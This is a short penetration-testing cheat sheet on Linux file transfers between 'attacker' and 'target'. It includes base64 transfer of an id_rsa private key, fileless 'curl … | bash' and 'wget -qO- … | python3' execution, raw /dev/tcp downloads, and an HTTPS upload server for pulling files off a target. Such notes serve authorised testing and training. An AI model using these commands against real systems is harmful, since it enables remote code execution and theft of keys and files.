Pentest Notes / File Transfers
Linux File Transfer
In this section
Download
Base64 Download
Get the md5 hash - for verification
md5sum id_rsa
Encode to base64 - attacker
cat id_rsa |base64 -w 0
Decode from base64 - target
echo -n '[base64_text]' | base64 -d > id_rsa
Web Downloads
wget
wget [link_to_file] -O /tmp/file.txt
cURL
curl -o /tmp/file.txt [link_to_file]
Fileless Attacks
wget
wget -qO- [link_to_file] | python3
-q for silent, -O- for not saving to a file, directly in terminal
cURL
curl [link_to_file] | bash
Download with bash (/dev/tcp)
Connect to the Target Webserver
exec 3<>/dev/tcp/[MACHINE_IP]/[PORT]
HTTP GET Request
echo -e "GET /[file] HTTP/1.1\n\n">&3
Print the Response
cat <&3
SSH
scp [username]@[MACHINE_IP]:[full_path_to_file] .
ssh must be installed and enabled
Upload
Web Upload
Install module
sudo python3 -m pip install --user uploadserver
Create self signed certificate for HTTPS
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
Web server must not host the certificate, store this somewhere else
Start Webserver
sudo python3 -m uploadserver 443 --server-certificate [location_of_certificate]
Upload files
curl -X POST https://192.168.49.128/upload -F 'files=@[location_1]' -F 'files=@[location_1]' --insecure
--insecure because certificate is self signed
SCP Upload
scp [full_file_location] [username]@[MACHINE_IP]:[folder_to_be_saved_in]
Alternate methods
Files accessible from the location this is executed
Python3
python3 -m http.server
Python 2.7
python2.7 -m SimpleHTTPServer
PHP
php -S 0.0.0.0:8000
Ruby
ruby -run -ehttpd . -p8000
Download the file
wget [MACHINE_IP]:8000/[file_name]